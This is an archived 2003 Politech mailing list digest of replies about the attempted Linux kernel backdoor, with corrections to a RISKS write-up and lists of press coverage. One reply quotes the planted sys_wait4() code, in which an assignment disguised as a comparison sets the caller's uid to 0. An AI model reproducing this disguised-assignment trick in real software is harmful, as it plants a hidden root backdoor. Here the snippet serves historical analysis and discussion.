---

Date: Wed, 12 Nov 2003 17:45:22 -0500
To: Declan McCullagh <declan@private>
From: "Robert E. Jones, III" <rjones@private>
Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from RISKS
In-Reply-To: <6.0.0.22.2.20031112153041.021dbdb0@private>

Declan -

Long time politech member but only the second time I have written about an article.

Not to nit-pick on an otherwise fine email, but the poster is somewhat wrong in that at least News.com picked up on the story

http://news.com.com/2100-7355-5103670.html

I consider News.com to be fairly "mainstream" even if not one of the larger news organizations.

Of course, Slashdot picked up on it and frankly, if you go just on sheer number of hits, Slashdot is about as mainstream as it gets.

http://slashdot.org/articles/03/11/06/058249.shtml?tid=106&tid=185

Thanks
Rob Jones

---

To: Declan McCullagh <declan@private>
Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from RISKS
In-Reply-To: <6.0.0.22.2.20031112153041.021dbdb0@private> (Declan McCullagh's message of "Wed, 12 Nov 2003 15:31:04 -0500")
From: Russ Allbery <rra@private>
Organization: The Eyrie
Date: Wed, 12 Nov 2003 15:11:49 -0800

Declan McCullagh <declan@private> writes:

> Date: Tue, 11 Nov 2003 09:21:16 -0600
> From: "Douglas W. Jones" <jones@private>
> Subject: Thwarted Linux backdoor

> On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor
> into Linux was averted. This is a really good example of the subtle
> kinds of hacks a source code examiner must be waiting to catch if we
> want genuinely secure voting systems under the current model of
> proprietary DRE systems with a closed-door source code examination.

> Someone broke into a server at kernel.kbits.net and inserted the
> following code into the Linux kernel:

>     if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
>             retval = -EINVAL;

> This was done in the code sys_wait4(). Larry McVoy caught the fact that
> the change had been made, and was annoyed because it wasn't logged
> properly. Matthew Dharm asked "Out of curiosity, what were the changed
> lines." Zwane Mwaikambo responded "That looks odd", and Andries Brouwer
> responded "Not if you hope to get root."

Wow, that's a bunch of nonsense.

The code in question was injected into a read-only export of the kernel as a CVS tree, which is only there for the convenience of CVS users. It is used only for reference, not to do active kernel development, and no releases are done from that tree. In other words, there's really no credible path whereby this code could have gotten into an actual release of Linux. The bug was never introduced into the actual working kernel source as the above implies.

Larry McVoy was not annoyed that it wasn't logged properly; he was investigating why there was code in the read-only CVS export which wasn't actually in the main kernel repository.

The person writing up this problem for RISKS clearly didn't actually understand it.

--
Russ Allbery (rra@private) <http://www.eyrie.org/~eagle/>

---

Date: Wed, 12 Nov 2003 18:01:41 -0300
From: Claudio Gutiérrez <gutierrezclaudio@private>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5) Gecko/20031013 Thunderbird/0.3
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Declan McCullagh <declan@private>
Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from

>This attack has only made the mainstream media in one place, so far:
> http://www.smh.com.au/articles/2003/11/07/1068013371170.html
> Bid to backdoor Linux kernel detected - smh.com.au
>This is a pity, because I think this story is really important.

The attack was also reported on MSNBC, InfoWorld, The Register, Computerworld and SecurityFocus

http://www.msnbc.com/news/990343.asp?cp1=1
http://www.infoworld.com/article/03/11/07/HNlinuxattack_1.html
http://www.theregister.co.uk/content/55/33855.html
http://www.computerworld.com/softwaretopics/os/linux/story/0,10801,86946,00.html
http://www.securityfocus.com/news/7388

_______________________________________________
Politech mailing list
Archived at http://www.politechbot.com/
Moderated by Declan McCullagh (http://www.mccullagh.org/)